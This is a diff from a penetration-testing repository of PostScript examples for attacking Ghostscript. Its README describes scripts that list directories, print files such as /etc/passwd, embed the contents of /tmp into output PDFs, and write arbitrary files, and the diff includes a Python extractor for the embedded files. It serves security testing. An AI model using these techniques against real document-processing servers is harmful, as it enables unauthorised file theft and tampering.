RedTeamPentesting
diff --git a/‎README.md
+99 b/‎README.md
+99
diff --git a/‎embed_files_in_pdf.ps
4.92 KB b/‎embed_files_in_pdf.ps
4.92 KB
diff --git a/‎extract_pdf_attachments.py
+36 b/‎extract_pdf_attachments.py
+36
diff --git a/‎list_files.ps
1.2 KB b/‎list_files.ps
1.2 KB
diff --git a/‎long_running_embed_files_in_pdf.ps
5.85 KB b/‎long_running_embed_files_in_pdf.ps
5.85 KB
diff --git a/‎print_file.ps
572 Bytes b/‎print_file.ps
572 Bytes
diff --git a/‎print_version.ps
1.51 KB b/‎print_version.ps
1.51 KB
diff --git a/‎write_file.ps
239 Bytes b/‎write_file.ps
239 Bytes
@@ -2,3 +2,102 @@ This repository contains PostScript examples useful for attacking Ghostscript.
 
 For details see the corresponding blog post:
 https://blog.redteam-pentesting.de/2023/ghostscript-overview/
+
+## `print_version.ps`
+
+Modified version of `print_version.ps` from [ghostinthepdf](https://github.com/neex/ghostinthepdf). Prints useful information about the configuration of Ghostscript.
+
+## `list_files.ps`
+
+Prints all filenames contained in the specified directory (by default `/tmp/`) to the output page.
+
+### Variables
+
+```
+% how many chars per line at most
+/charactercount 100 def
+
+% Which directory should be listed
+/target_directory (/tmp/*) def
+```
+
+## `print_file.ps`
+
+Writes the content of the specified file to the page. The used function needs to be specified at the end of the code:
+
+- `PrintFileBase64`: Prints files encoded as Base64 onto the page, useful for binary files.
+
+```
+(/usr/bin/bash) PrintFileBase64
+```
+
+- `PrintFileAsText`: Prints the content of files onto the page, respects newlines. Useful for simple text files, but binary files can also be printed if needed.
+
+```
+(/etc/passwd) PrintFileAsText
+```
+
+### Variables
+
+```
+% how many chars per line at most
+/charactercount 100 def
+```
+
+## `embed_files_in_pdf.ps`
+
+This script embeds all files in the specified directory (by default `/tmp/`) in the output PDF file using PDFMark.
+Only works with `pdfwrite` device for that reason.
+Use `extract_pdf_attachments.py` to extract all files from the PDF, or any capable PDF reader.
+
+### Variables
+
+```
+% How many files can be included at most
+/maxFileCount 100 def
+
+% The folder with wildcard which will be embedded
+/targetFolder (/tmp/*) def
+
+% Enables printing error information to the page
+/printErrors false def
+```
+
+## `long_running_embed_files.ps`
+
+Similar to `embed_files_in_pdf.ps`, but runs for a specified amount of time and collects short-lived files by scanning the specified directory in regular intervals.
+
+### Variables
+
+```
+% how often files should be checked
+/totalRounds 1000 def
+
+% How many milliseconds to sleep inbetween rounds
+/sleepDuration 10 def
+
+% How many files can be included at most
+/maxFileCount 100 def
+
+% The folder with wildcard which will be embedded
+/targetFolder (/tmp/*) def
+
+% Enables printing error information to the page
+/printErrors false def
+```
+
+## `write_file.ps`
+
+Writing files onto the disk. The used function needs to be specified at the end of the code:
+
+- Writing plaintext: Useful for simple and short text file:
+
+```
+outfile (Output string which will be written to outfile) writestring
+```
+
+- `base64Decode`: Base64 decodes the input string. Useful for embedding (binary) files in PostScript. Decoding and writing to file:
+
+```
+(SGFsbG8gV2VsdAo=) base64Decode { outfile exch write } forall
+```
@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+# very slightly modified version of https://gist.github.com/kevinl95/29a9e18d474eb6e23372074deff2df38 with cmd arguments and by default no output
+import PyPDF2
+import sys
+from pathlib import Path
+
+
+def getAttachments(reader):
+    """
+    Retrieves the file attachments of the PDF as a dictionary of file names
+    and the file data as a bytestring.
+     :return: dictionary of filenames and bytestrings
+    """
+    catalog = reader.trailer["/Root"]
+    fileNames = catalog["/Names"]["/EmbeddedFiles"]["/Kids"][0].getObject()["/Names"]
+    attachments = {}
+    for f in fileNames:
+        if isinstance(f, str):
+            name = f
+            dataIndex = fileNames.index(f) + 1
+            fDict = fileNames[dataIndex].getObject()
+            fData = fDict["/EF"]["/F"].getData()
+            attachments[name] = fData
+    return attachments
+
+
+handler = open(sys.argv[1], "rb")
+reader = PyPDF2.PdfFileReader(handler)
+dictionary = getAttachments(reader)
+
+# print(dictionary)
+for fName, fData in dictionary.items():
+    path = Path.cwd() / ("." + str(Path(fName).resolve()))
+    path.parent.mkdir(parents=True, exist_ok=True)
+    with open(path, "wb") as outfile:
+        outfile.write(fData)